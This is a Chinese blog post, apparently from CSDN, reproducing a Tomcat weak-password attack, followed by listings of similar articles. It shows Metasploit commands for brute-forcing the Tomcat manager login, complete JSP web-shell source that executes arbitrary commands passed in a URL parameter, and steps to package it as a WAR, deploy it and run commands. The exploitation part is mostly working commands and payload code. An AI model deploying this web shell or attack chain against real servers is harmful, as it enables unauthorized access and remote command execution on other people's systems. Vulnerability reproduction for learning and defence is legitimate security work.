Tomcat弱口令+war部署getshell

最新推荐文章于 2024-04-24 11:07:32 发布
最新推荐文章于 2024-04-24 11:07:32 发布
阅读量225 收藏
点赞数
分类专栏: 渗透测试 文章标签: tomcat jsp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_utao/article/details/114968428
版权

影响版本

全版本

漏洞复现

msf爆破

use auxiliary/scanner/http/tomcat_mgr_login

设置IP和端口

set rhosts 10.7.10.41
set rport 8080(默认端口)

run运行
在这里插入图片描述

tomcat:tomcat

在这里插入图片描述
登陆成功
在这里插入图片描述
用大佬的jsp一句话马
在这里插入图片描述

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

然后把shell.jsp压缩成zip然后改后缀为1.war上传
在这里插入图片描述
访问地址:http://xxxxxx:8080/1/shell.jsp
传参pwd和i

?pwd=123&i=ls(执行命令)

在这里插入图片描述
QQ:3075999532

参考文章:
https://www.cnblogs.com/mke2fs/p/12718669.html
https://www.cnblogs.com/qianxinggz/p/13440366.html

p_utao
关注
专栏目录
【漏洞复现】 tomcat-pass-getshell 弱口令
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-11 515
Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。通过弱口令登录后台,部署war包geshell
Tomcat 弱口令及文件上传漏洞复现
君莫hacker的博客
09-16 3405
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现 0x01 漏洞介绍 漏洞描述 漏洞编号 受影响版本 0x02 环境部署: 搭建一次,复现百次 靶机 ip:192.168.30.209 kali ip:192.168.30.182 0x03 漏洞复现 从github下载tomcat8的源码,我们可以查看到tomcat的默认登录名为tomcat,并且密码也为tomcat 点击Server Status进行登录 弱口令tomcat tomcat 直接登录成功 发现文件上传点
Tomcat WAR部署getshell
aqi_sec的博客
07-06 2267
Tomcat WAR部署getshell
Tomcat弱口令后台部署war包getshell
最新发布
qq_59102311的博客
04-24 2361
3.点击Manager App,跳转http://127.0.0.1:8080/manager/html,要求登录验证。6.使用auxiliary/scanner/http/tomcat_mgr_login模块,查看详细信息。1.进入/vulhub/tomcat/tomcat8目录,启动docker。8.运行模块,爆破得出用户名和密码:tomcat:tomcat。13. 打开蚁剑,输入url,密码cmd,成功getshell。11.使用cmd命令,将jsp文件打包成war包。7.设置目标IP和目标端口。
vulhub复现之tomcat8.0.43弱口令&war远程部署漏洞复现
m0_70483044的博客
07-19 2640
学习时间2022.7.18一日之计在于晨,一年之计在于春。
Tomcat后台拿shellwar
blrk
02-20 2167
http://huaidan.org/archives/1207.html
Tomcat后台上传war包getshell复现
一瓶草莓酱的博客
03-17 3797
环境搭建 页面浏览: 漏洞简介 tomcat是apache软件基金会的核心项目,tomcat服务器是一个免费的开放源代码的web应用服务器,属于轻量级应用服务器。默认端口:8080 tomcat是一个中间件,在B/S架构中,浏览器发出的http请求经过tpmcat中间件,转发到最终的目的服务器上,响应消息再通过tomcat返回给浏览器。 tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。 图中可以看到ma
Tomcat 弱口令爆破登陆 War包上传 Getshell
小晓晓晓林的博客
01-28 1248
影响版本 Tomcat全版本 环境搭建 前两篇文章有提到,这里不再赘述 尝试复现 利用burpsuite进行爆破Manager登陆页 http://10.130.3.245:8080/manager/html
Tomcat弱口令进入后台部署war包getshell
weixin_50053818的博客
06-30 1126
文章目录环境docker+vuhub搭建环境爆破进入后台上传war包getshell 环境 vulhub docker-compose kali docker+vuhub搭建环境 通过git将vulhub仓库克隆到本地中。 ``` git clone https://github.com/vulhub/vulhub ``` 进入vulhub目录下的tomcat目录即可。 执行docker-compose up -d即可完成tomcat的搭建。 爆破进入后台 直接访问ip:port即可进入tomca
Tomcat7+ 弱口令 && 后台getshell漏洞简介
玄道的网安博客
06-13 2244
简介 此次环境是模拟真实环境,漏洞为弱口令和支持在后台部署war文件 环境说明 Tomcat7+权限分为: manager(后台管理) manager-gui 拥有html页面权限 manager-status 拥有查看status的权限 manager-script 拥有text接口的权限,和status权限 manager-jmx 拥有jmx权限,和status权限 host-manager(虚拟主机管理) admin-gui 拥有html页面权限 在conf/tomcat-.
Tomcat部署war
Rickwubaa的博客
02-17 183
Tomcat部署war
Tomcat页面弱口令war包上传Getshell
来到了学渣的博客
07-19 3059
思路 burpsuit对tomcat进行弱口令爆破→利用弱口令进入tomcat管理页面→制作war包上传getshell 在vulhub路径/vulhub/tomcat/tomcat8中启动tomcat环境 Tomcat默认页面登录管理在manager/html路径下 启动burpsuit抓包进行弱口令爆破 对Basic后面那一段base64进行解码发现是这样的一个格式 账号:密码 发送至爆破处 然后再选择encode编码 阿里云搭建漏洞环境跑爆破居然会ban掉自己ip。。。只能从虚拟机来
Tomcat弱口令爆破&war包上传
weixin_51151498的博客
12-06 1463
tomcat弱口令
【Vulfocus靶场-初级】Tomcat后台弱口令+War包文件上传Getshell漏洞复现
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
08-26 3747
Vulfocus靶场漏洞,Tomcat后台弱口令War包文件上传Getshell漏洞复现,利用冰蝎/哥斯拉进一步方便命令执行,获得flag并提交,通过tomcat靶场。
src挖掘之Tomcat未授权弱口令+war后门上传
huangyongkang666的博客
07-18 3430
高危src挖掘
vulhub之tomcat弱口令+部署war包GetShell
lionwerson的博客
04-04 594
1.拉取靶场镜像,打开靶场 2.登陆抓包进行爆破,设置一个位置,然后选择类型为custom iterator,然后在下面payload选项中选择三个位置,然后增加编码的方式,最后一定要取消勾选,在选项最下面的url编码特殊字符,否则就算爆出了弱口令也无法显示成功。 如果勾选了url编码特殊字符就会让生成的base64编码的结尾的等号被url编码,即使看到的payload正确,但是请求不正确,所以显示不成功。 密码是tomcat,用户名也是。 3.进入后台上传文件,然后getshel.
文件上传漏洞:getshell的最好方式,我们如何防御?
李熠专用博客_白帽子一枚,人称低危终结者
09-09 3057
我相信,你在开发Web应用时,后端一定会提供文件的上传功能,比如前端页面肯定有图片的展示,后端必定会提供图片的上传入口。但是,你在做文件上传功能时,是否考虑过它的安全性问题呢? 请看下面的代码: @PostMapping("upload") public String upload(@RequestParam("file")MultipartFile file,HttpServletRequest request)throws Exception{ String filename = fil.
生命在于学习——网站Getshell的方法
易水哲的博客
09-08 3830
网站Getshell的方法
快速部署WAR文件到Tomcat服务器教程
在本文档中,我们将深入探讨如何在Windows系统上使用Apache Tomcat服务器部署WAR文件。首先,确保已正确安装Java Development Kit (JDK) 和 Tomcat。接下来,按照以下步骤操作: 1. **启动Tomcat服务**:定位到...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值